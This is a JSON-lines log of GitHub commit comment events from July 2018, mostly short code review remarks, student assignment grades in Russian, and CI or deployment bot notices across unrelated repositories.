{"id":"7946321173","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"dimatveev2003/CPP2018"},"payload":{"comment":{"id":29662796,"position":null,"line":null,"path":null,"commit_id":"23051604b61e1a5781c303d6268f76b720f5fa24","created_at":"2018-07-10T20:55:09Z","updated_at":"2018-07-10T20:55:09Z","author_association":"NONE","body":"10/10."}},"created_at":"2018-07-10T20:55:09Z"}
{"id":"7946323526","type":"CommitCommentEvent","actor":{"login":"twsvendsen"},"repo":{"name":"twsvendsen/chef-planner"},"payload":{"comment":{"id":29662803,"position":22,"line":76,"path":"src/main/java/tws/rsi/controller/AddIngredientController.java","commit_id":"91506d2d4155937f4dbfb47eb1fca77102ad52ef","created_at":"2018-07-10T20:55:37Z","updated_at":"2018-07-10T20:55:37Z","author_association":"OWNER","body":"Saving ingredient through ingredientService populates the id (now generated via sequence method) prior to adding it to recipe (which needs the id for hashmap purposes)."}},"created_at":"2018-07-10T20:55:37Z"}
{"id":"7946324186","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29662804,"position":null,"line":null,"path":null,"commit_id":"6c0777f6e014e070b7f16ad7969482f2bd01807d","created_at":"2018-07-10T20:55:45Z","updated_at":"2018-07-10T20:55:45Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-10](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-10).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-10-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-10T20:55:45Z"}
{"id":"7946324537","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662807,"position":1,"line":1,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:55:50Z","updated_at":"2018-07-10T20:55:50Z","author_association":"MEMBER","body":"This isn't needed."}},"created_at":"2018-07-10T20:55:50Z"}
{"id":"7946327727","type":"CommitCommentEvent","actor":{"login":"gmrchk"},"repo":{"name":"gmrchk/swup"},"payload":{"comment":{"id":29662812,"position":null,"line":null,"path":null,"commit_id":"3f6ce70cba23dda46fd37f181f86c818436df74d","created_at":"2018-07-10T20:56:28Z","updated_at":"2018-07-10T20:56:28Z","author_association":"OWNER","body":"fixed #20 "}},"created_at":"2018-07-10T20:56:28Z"}
{"id":"7946328593","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662817,"position":7,"line":7,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:56:39Z","updated_at":"2018-07-10T20:56:39Z","author_association":"MEMBER","body":"Don't need to use this."}},"created_at":"2018-07-10T20:56:39Z"}
{"id":"7946328850","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662818,"position":32,"line":32,"path":"week-08/day-02/ListingToDos/ListingToDos/Controllers/TodoController.cs","commit_id":"c019d02f106a0ff1d397554916e7be4f690e6cad","created_at":"2018-07-10T20:56:42Z","updated_at":"2018-07-10T20:56:42Z","author_association":"NONE","body":"missing new line here"}},"created_at":"2018-07-10T20:56:42Z"}
{"id":"7946329089","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662819,"position":8,"line":8,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:56:45Z","updated_at":"2018-07-10T20:56:45Z","author_association":"MEMBER","body":"Or this."}},"created_at":"2018-07-10T20:56:45Z"}
{"id":"7946329311","type":"CommitCommentEvent","actor":{"login":"sigurpol"},"repo":{"name":"airtame/mfgtools"},"payload":{"comment":{"id":29662820,"position":29,"line":1449,"path":"Apps/MfgToolLib/MfgToolLib.cpp","commit_id":"18e3bd2b118f20c2b6829060e498036fb911d550","created_at":"2018-07-10T20:56:47Z","updated_at":"2018-07-10T20:56:47Z","author_association":"NONE","body":"What should we do if the element is not found?"}},"created_at":"2018-07-10T20:56:47Z"}
{"id":"7946330229","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662828,"position":30,"line":30,"path":"week-08/day-02/ListingToDos/ListingToDos/Controllers/TodoController.cs","commit_id":"c019d02f106a0ff1d397554916e7be4f690e6cad","created_at":"2018-07-10T20:56:59Z","updated_at":"2018-07-10T20:56:59Z","author_association":"NONE","body":"remove empty line here and put it to the end of this file :)"}},"created_at":"2018-07-10T20:56:59Z"}
{"id":"7946330643","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29662831,"position":5,"line":76,"path":"pkgs/top-level/haskell-packages.nix","commit_id":"c85f23a82a6ae9a5b38a789897e455b11983e528","created_at":"2018-07-10T20:57:04Z","updated_at":"2018-07-10T20:57:04Z","author_association":"MEMBER","body":"`841Binary`? Do we have that?"}},"created_at":"2018-07-10T20:57:04Z"}
{"id":"7946332127","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662835,"position":16,"line":16,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:57:22Z","updated_at":"2018-07-10T20:57:22Z","author_association":"MEMBER","body":"use ```path.join``` here."}},"created_at":"2018-07-10T20:57:22Z"}
{"id":"7946334158","type":"CommitCommentEvent","actor":{"login":"JiachengXu"},"repo":{"name":"gokberkkaraca/zlint"},"payload":{"comment":{"id":29662839,"position":null,"line":null,"path":null,"commit_id":"06ff1ee9d834824894208cac1c04ebd396dde961","created_at":"2018-07-10T20:57:46Z","updated_at":"2018-07-10T20:57:46Z","author_association":"NONE","body":"> I renamed the imports because I want the modified files to be used, which will be in my forked repository. If I keep them instead of renaming, wouldn't it import the old files from the original repository?\r\nActually the import in golang means import from the library which stays locally, for example, `github.com/zmap/zcrypto/x509` means import from `GOPATH/github.com/zmap/zcrypto/x509` folder"}},"created_at":"2018-07-10T20:57:46Z"}
{"id":"7946335387","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662842,"position":20,"line":20,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:58:02Z","updated_at":"2018-07-10T20:58:02Z","author_association":"MEMBER","body":"This needs to be done outside the function, as it is blocking."}},"created_at":"2018-07-10T20:58:02Z"}
{"id":"7946336289","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"rINAtvERESHAGIN/CPP2018"},"payload":{"comment":{"id":29662843,"position":null,"line":null,"path":null,"commit_id":"82d0cc8ff4ae5c08bca0b7bdaa2e21e8f20df282","created_at":"2018-07-10T20:58:13Z","updated_at":"2018-07-10T20:58:13Z","author_association":"NONE","body":"1) Программа не компилируется в Трэвисе. Ошибки.\r\n2) нельзя сравнивать double и константу с помощью == (только int), необходимо сравнивать их разницу с заданным уровнем точности.\r\nПока 5/10."}},"created_at":"2018-07-10T20:58:13Z"}
{"id":"7946336845","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662846,"position":8,"line":8,"path":"week-08/day-02/ListingToDos/ListingToDos/Controllers/TodoController.cs","commit_id":"c019d02f106a0ff1d397554916e7be4f690e6cad","created_at":"2018-07-10T20:58:20Z","updated_at":"2018-07-10T20:58:20Z","author_association":"NONE","body":"What I miss from this controller:\r\n`[HttpGet]` and `[HttpPost]` methods to implement the core logic of the endpoint skeleton (db, views...)"}},"created_at":"2018-07-10T20:58:20Z"}
{"id":"7946338413","type":"CommitCommentEvent","actor":{"login":"awoodruff"},"repo":{"name":"axismaps/contours"},"payload":{"comment":{"id":29662851,"position":null,"line":null,"path":null,"commit_id":"afac889872ea3317d162c96796450138e02cd122","created_at":"2018-07-10T20:58:39Z","updated_at":"2018-07-10T20:58:39Z","author_association":"MEMBER","body":"@davidheyman if you want to look/mess around with anything, this branch has my latest efforts, where a whole map image is exported instead of a page layout image. I added the functions here for image upload but didn't go very far with that. There's a commented-out call to `getSignedRequest(blob)` which I think is where it would go."}},"created_at":"2018-07-10T20:58:39Z"}
{"id":"7946339294","type":"CommitCommentEvent","actor":{"login":"JiachengXu"},"repo":{"name":"gokberkkaraca/zlint"},"payload":{"comment":{"id":29662853,"position":null,"line":null,"path":null,"commit_id":"06ff1ee9d834824894208cac1c04ebd396dde961","created_at":"2018-07-10T20:58:49Z","updated_at":"2018-07-10T20:58:49Z","author_association":"NONE","body":"Are you still online on Slack? We can talk there!"}},"created_at":"2018-07-10T20:58:49Z"}
{"id":"7946340786","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29662858,"position":7,"line":488,"path":"assets/sass/common/_reboot.sass","commit_id":"feda5039b2eddb2850be4d4a5dbd85b9aab7c61b","created_at":"2018-07-10T20:59:08Z","updated_at":"2018-07-10T20:59:08Z","author_association":"OWNER","body":"вообще, это всё зависит от того, как ты строишь работу, так то можно всё и в одном файле фигачить, но это не удобно. как показала практика 1 блок = 1 файл"}},"created_at":"2018-07-10T20:59:08Z"}
{"id":"7946341211","type":"CommitCommentEvent","actor":{"login":"sigurpol"},"repo":{"name":"airtame/mfgtools"},"payload":{"comment":{"id":29662860,"position":14,"line":1437,"path":"Apps/MfgToolLib/MfgToolLib.cpp","commit_id":"18e3bd2b118f20c2b6829060e498036fb911d550","created_at":"2018-07-10T20:59:13Z","updated_at":"2018-07-10T20:59:13Z","author_association":"NONE","body":"const CString &?"}},"created_at":"2018-07-10T20:59:13Z"}
{"id":"7946342759","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"greysova/CPP2018"},"payload":{"comment":{"id":29662864,"position":null,"line":null,"path":null,"commit_id":"bdb1983617a3edf01163972f9906ea5d65600762","created_at":"2018-07-10T20:59:30Z","updated_at":"2018-07-10T20:59:30Z","author_association":"NONE","body":"Вы не поняли смысла теста: тест не считывает ввод пользователя, а сравнивает с заранее известным ответом. Кроме того, должен быть вне main()\r\nПока 7/10."}},"created_at":"2018-07-10T20:59:30Z"}
{"id":"7946342973","type":"CommitCommentEvent","actor":{"login":"sigurpol"},"repo":{"name":"airtame/mfgtools"},"payload":{"comment":{"id":29662865,"position":21,"line":1442,"path":"Apps/MfgToolLib/MfgToolLib.cpp","commit_id":"18e3bd2b118f20c2b6829060e498036fb911d550","created_at":"2018-07-10T20:59:33Z","updated_at":"2018-07-10T20:59:33Z","author_association":"NONE","body":"const CString&?"}},"created_at":"2018-07-10T20:59:33Z"}
{"id":"7946343768","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29662867,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T20:59:42Z","updated_at":"2018-07-10T20:59:42Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-10T20:59:42Z"}
{"id":"7946343862","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/Lokhajtasosmokus"},"payload":{"comment":{"id":29662870,"position":28,"line":28,"path":"week-08/day-02/ListingToDos/ListingToDos/Startup.cs","commit_id":"c019d02f106a0ff1d397554916e7be4f690e6cad","created_at":"2018-07-10T20:59:43Z","updated_at":"2018-07-10T20:59:43Z","author_association":"NONE","body":"db connection looks good"}},"created_at":"2018-07-10T20:59:43Z"}
{"id":"7946344836","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662871,"position":40,"line":40,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T20:59:54Z","updated_at":"2018-07-10T20:59:54Z","author_association":"MEMBER","body":"You don't need to use `pipe` + `concat`, you can use an event listener here and buffer the data."}},"created_at":"2018-07-10T20:59:54Z"}
{"id":"7946347654","type":"CommitCommentEvent","actor":{"login":"sigurpol"},"repo":{"name":"airtame/mfgtools"},"payload":{"comment":{"id":29662876,"position":32,"line":1452,"path":"Apps/MfgToolLib/MfgToolLib.cpp","commit_id":"18e3bd2b118f20c2b6829060e498036fb911d550","created_at":"2018-07-10T21:00:26Z","updated_at":"2018-07-10T21:00:26Z","author_association":"NONE","body":"The method could (should ) be const  I think"}},"created_at":"2018-07-10T21:00:26Z"}
{"id":"7946348537","type":"CommitCommentEvent","actor":{"login":"kaushalmodi"},"repo":{"name":"gohugoio/hugo"},"payload":{"comment":{"id":29662878,"position":142,"line":133,"path":"media/mediaType.go","commit_id":"b874a1ba7ab8394dc741c8c70303a30a35b63e43","created_at":"2018-07-10T21:00:36Z","updated_at":"2018-07-10T21:00:36Z","author_association":"CONTRIBUTOR","body":"Are these non-empty OldSuffix values causing that deprecation warning to always appear?"}},"created_at":"2018-07-10T21:00:36Z"}
{"id":"7946348741","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662880,"position":45,"line":45,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:00:39Z","updated_at":"2018-07-10T21:00:39Z","author_association":"MEMBER","body":"Why are you writing true back to the server?"}},"created_at":"2018-07-10T21:00:39Z"}
{"id":"7946350053","type":"CommitCommentEvent","actor":{"login":"sigurpol"},"repo":{"name":"airtame/mfgtools"},"payload":{"comment":{"id":29662882,"position":27,"line":1447,"path":"Apps/MfgToolLib/MfgToolLib.cpp","commit_id":"18e3bd2b118f20c2b6829060e498036fb911d550","created_at":"2018-07-10T21:00:54Z","updated_at":"2018-07-10T21:00:54Z","author_association":"NONE","body":"This method could be const "}},"created_at":"2018-07-10T21:00:54Z"}
{"id":"7946350114","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662883,"position":19,"line":19,"path":"package.json","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:00:55Z","updated_at":"2018-07-10T21:00:55Z","author_association":"MEMBER","body":"Not needed."}},"created_at":"2018-07-10T21:00:55Z"}
{"id":"7946350365","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"arinelya/CPP2018"},"payload":{"comment":{"id":29662884,"position":null,"line":null,"path":null,"commit_id":"191a551caf8c0fc155dbf49b619b06616809184b","created_at":"2018-07-10T21:00:58Z","updated_at":"2018-07-10T21:00:58Z","author_association":"NONE","body":"Тест должен сравнивать результат с известным значением. 1 примера в тесте мало.\r\nДопишите, пожалуйста."}},"created_at":"2018-07-10T21:00:58Z"}
{"id":"7946350485","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662885,"position":20,"line":20,"path":"package.json","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:00:59Z","updated_at":"2018-07-10T21:00:59Z","author_association":"MEMBER","body":"Not needed."}},"created_at":"2018-07-10T21:00:59Z"}
{"id":"7946353154","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"zstngr/CPP2018"},"payload":{"comment":{"id":29662891,"position":null,"line":null,"path":null,"commit_id":"45e86efbb49a230919205f03ddb169eddfbbf8af","created_at":"2018-07-10T21:01:32Z","updated_at":"2018-07-10T21:01:32Z","author_association":"NONE","body":"10/10"}},"created_at":"2018-07-10T21:01:32Z"}
{"id":"7946354759","type":"CommitCommentEvent","actor":{"login":"maxbrunsfeld"},"repo":{"name":"tree-sitter/tree-sitter"},"payload":{"comment":{"id":29662895,"position":null,"line":null,"path":null,"commit_id":"a17500f9a2cc896c2f6012d7adf0fcf86f09c271","created_at":"2018-07-10T21:01:51Z","updated_at":"2018-07-10T21:01:51Z","author_association":"MEMBER","body":"This fixes a bug introduced in https://github.com/tree-sitter/tree-sitter/pull/172 that made it possible for `ts_node_parent` to return invalid data for trees with outstanding edits."}},"created_at":"2018-07-10T21:01:51Z"}
{"id":"7946356427","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662897,"position":10,"line":10,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:02:11Z","updated_at":"2018-07-10T21:02:11Z","author_association":"MEMBER","body":"Why is this being saved out of scope?"}},"created_at":"2018-07-10T21:02:11Z"}
{"id":"7946357821","type":"CommitCommentEvent","actor":{"login":"awoodruff"},"repo":{"name":"axismaps/contours"},"payload":{"comment":{"id":29662904,"position":null,"line":null,"path":null,"commit_id":"d32f416bf29a9b8034bf570e15c6f81fe13dccb9","created_at":"2018-07-10T21:02:27Z","updated_at":"2018-07-10T21:02:27Z","author_association":"MEMBER","body":"@davidheyman and FYI this one adds a function that exports an image of a full layout including a title. Currently `downloadPageWithTitle(\"0.625\")` would do an image for 11x17, and `downloadPageWithTitle(\"0.74\")` would do 18x24. (Neither image includes margins; they assume the image would be placed on a page within 1-inch margins.)"}},"created_at":"2018-07-10T21:02:27Z"}
{"id":"7946358592","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662905,"position":41,"line":41,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:02:37Z","updated_at":"2018-07-10T21:02:37Z","author_association":"MEMBER","body":"This shouldn't be needed."}},"created_at":"2018-07-10T21:02:37Z"}
{"id":"7946359728","type":"CommitCommentEvent","actor":{"login":"bosung90"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29662913,"position":27,"line":26,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T21:02:51Z","updated_at":"2018-07-10T21:02:51Z","author_association":"COLLABORATOR","body":"if company is empty string it is still falsy and empty string will be rendered to the screen. forcing boolean ensures nothing unexpected renders to the screen"}},"created_at":"2018-07-10T21:02:51Z"}
{"id":"7946361396","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29662914,"position":null,"line":null,"path":null,"commit_id":"bc25c98f4673e69078bd67b9d83bfd3f9aa954dd","created_at":"2018-07-10T21:03:12Z","updated_at":"2018-07-10T21:03:12Z","author_association":"NONE","body":"You are right, I did not know that. But that is odd, an existing `creature_template.entry` for a non-skinnable creature used as skinning loot entry for other skinnable creatures instead of their own `creature_template` entries (or even a reference table entry)."}},"created_at":"2018-07-10T21:03:12Z"}
{"id":"7946362317","type":"CommitCommentEvent","actor":{"login":"bosung90"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29662919,"position":42,"line":35,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T21:03:23Z","updated_at":"2018-07-10T21:03:23Z","author_association":"COLLABORATOR","body":"awesome, will correct it"}},"created_at":"2018-07-10T21:03:23Z"}
{"id":"7946362320","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"dsuserg/CPP2018"},"payload":{"comment":{"id":29662918,"position":null,"line":null,"path":null,"commit_id":"5898aeb87df14444dac1d2c5ad519c29b87d35fd","created_at":"2018-07-10T21:03:23Z","updated_at":"2018-07-10T21:03:23Z","author_association":"NONE","body":"Одного примера в тесте мало, кроме того, тест должен сравнивать результат с известным значением. Доделайте, пожалуйста."}},"created_at":"2018-07-10T21:03:23Z"}
{"id":"7946362880","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662921,"position":3,"line":3,"path":"systemd-units/iml-update-handler.service","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:03:30Z","updated_at":"2018-07-10T21:03:30Z","author_association":"MEMBER","body":"Can we use journal here instead?"}},"created_at":"2018-07-10T21:03:30Z"}
{"id":"7946371495","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29662945,"position":null,"line":null,"path":null,"commit_id":"90a78627355f72a751be755a81434043507991d1","created_at":"2018-07-10T21:05:16Z","updated_at":"2018-07-10T21:05:16Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [tika118](https://tika118-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/external-libraries](https://tika118-static-docs.pantheonsite.io/docs/external-libraries)\n"}},"created_at":"2018-07-10T21:05:16Z"}
{"id":"7946376005","type":"CommitCommentEvent","actor":{"login":"tronstronics"},"repo":{"name":"tronscan/tronsr-template"},"payload":{"comment":{"id":29662957,"position":null,"line":null,"path":null,"commit_id":"1ec3ad1309212e973c07c345fb43d2b356228b8a","created_at":"2018-07-10T21:06:14Z","updated_at":"2018-07-10T21:06:14Z","author_association":"NONE","body":"![banner](https://user-images.githubusercontent.com/40417942/42537666-29add30e-845b-11e8-9de1-f6716459a195.png)\r\n"}},"created_at":"2018-07-10T21:06:14Z"}
{"id":"7946376824","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29662959,"position":null,"line":null,"path":null,"commit_id":"7f38dbd7b44a466f60914370b44b186aeccff284","created_at":"2018-07-10T21:06:25Z","updated_at":"2018-07-10T21:06:25Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-2](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-10T21:06:25Z"}
{"id":"7946381503","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662967,"position":3,"line":3,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:07:24Z","updated_at":"2018-07-10T21:07:24Z","author_association":"MEMBER","body":"prefer `const` over `var`"}},"created_at":"2018-07-10T21:07:24Z"}
{"id":"7946387594","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"tmirmota/reactvancouver"},"payload":{"comment":{"id":29662982,"position":27,"line":26,"path":"src/components/Speaker.js","commit_id":"383b667da75ba498a1f2b4d5a38c09553d90833c","created_at":"2018-07-10T21:08:37Z","updated_at":"2018-07-10T21:08:37Z","author_association":"OWNER","body":"Contentful returns `null` for empty strings in the db"}},"created_at":"2018-07-10T21:08:37Z"}
{"id":"7946392869","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29662992,"position":35,"line":35,"path":"handler.js","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:09:44Z","updated_at":"2018-07-10T21:09:44Z","author_association":"MEMBER","body":"I don't think we need to write a response and a response header back, just a header should be sufficient."}},"created_at":"2018-07-10T21:09:44Z"}
{"id":"7946395014","type":"CommitCommentEvent","actor":{"login":"oksanaguba"},"repo":{"name":"E3SM-Project/E3SM"},"payload":{"comment":{"id":29662998,"position":4,"line":16,"path":"components/homme/cmake/machineFiles/cori-haswell.cmake","commit_id":"b6928c20ece38eb2650e76991150af89e66ec4b3","created_at":"2018-07-10T21:10:12Z","updated_at":"2018-07-10T21:10:12Z","author_association":"CONTRIBUTOR","body":"hi Chris, i am just curious how this would work after merge -- if the folder is not defined, will homme build?"}},"created_at":"2018-07-10T21:10:12Z"}
{"id":"7946396055","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29662999,"position":97,"line":97,"path":"src/test/java/com/crud/tasks/trello/client/TrelloClientTest.java","commit_id":"d0a58d791850ac72946dd3f8d7b16dbc3b05ed83","created_at":"2018-07-10T21:10:25Z","updated_at":"2018-07-10T21:10:25Z","author_association":"NONE","body":"W thenReturn powinien być null"}},"created_at":"2018-07-10T21:10:25Z"}
{"id":"7946397774","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29663001,"position":17,"line":17,"path":"StockMarket.UnitTests/StockMarketRepositoryTests.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T21:10:47Z","updated_at":"2018-07-10T21:10:47Z","author_association":"NONE","body":"Generally, I also use the approach with comments Act, Arrange, Assert but only in the case when the body of my unit test is quite big. It helps to distinguish the section of the unit test, which helps to read it's logic. In a small unit test, I would KISS."}},"created_at":"2018-07-10T21:10:47Z"}
{"id":"7946398384","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29663003,"position":null,"line":null,"path":null,"commit_id":"6a530b8949f808b49a4cc8695d819d38dc39e13c","created_at":"2018-07-10T21:10:55Z","updated_at":"2018-07-10T21:10:55Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/mass-operations-dialog-long-i18n-texts-overlap-with-button-boundaries/87891/4\n"}},"created_at":"2018-07-10T21:10:55Z"}
{"id":"7946400988","type":"CommitCommentEvent","actor":{"login":"jgrund"},"repo":{"name":"whamcloud/iml-update-check"},"payload":{"comment":{"id":29663007,"position":23,"line":23,"path":"package.json","commit_id":"c70abb8cf592047bea4d4d6b3418d53d054725b3","created_at":"2018-07-10T21:11:28Z","updated_at":"2018-07-10T21:11:28Z","author_association":"MEMBER","body":"Let's use `prettier` and `eslint` here so the code will be auto-formatted."}},"created_at":"2018-07-10T21:11:28Z"}
{"id":"7946403173","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29663013,"position":71,"line":604,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"637ae514811e381ab1b0294164594cce5849a7e1","created_at":"2018-07-10T21:11:57Z","updated_at":"2018-07-10T21:11:57Z","author_association":"CONTRIBUTOR","body":"Now I found out and created pull request #333.\r\nThe tests failed due to my global git settings.\r\nMaybe that's also the case for your inconsistencies."}},"created_at":"2018-07-10T21:11:57Z"}
{"id":"7946403889","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29663014,"position":null,"line":null,"path":null,"commit_id":"f5c7b6fd3b8fe250c25a7fd82e4498ace0cd7193","created_at":"2018-07-10T21:12:07Z","updated_at":"2018-07-10T21:12:07Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-11](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-11-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-10T21:12:07Z"}
{"id":"7946404570","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"clojure-emacs/cider-nrepl"},"payload":{"comment":{"id":29663019,"position":null,"line":null,"path":null,"commit_id":"1bb9fa31f72214e19c76a93a70151ade6581fb35","created_at":"2018-07-10T21:12:15Z","updated_at":"2018-07-10T21:12:15Z","author_association":"CONTRIBUTOR","body":"This would not work with the new boot task. Which was the reason of the original change"}},"created_at":"2018-07-10T21:12:15Z"}
{"id":"7946405981","type":"CommitCommentEvent","actor":{"login":"ssw3r"},"repo":{"name":"ssw3r/pantheon-give-to-uva"},"payload":{"comment":{"id":29663023,"position":null,"line":null,"path":null,"commit_id":"9ad2a2e7f73224b2f91322492c7a9119479b0e78","created_at":"2018-07-10T21:12:32Z","updated_at":"2018-07-10T21:12:32Z","author_association":"OWNER","body":"Created multidev environment [pantheon-give-to-uva#ci-4](https://dashboard.pantheon.io/sites/b74c531d-f25b-4a5a-8aca-813c48288835#ci-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-4-pantheon-give-to-uva.pantheonsite.io/)"}},"created_at":"2018-07-10T21:12:32Z"}
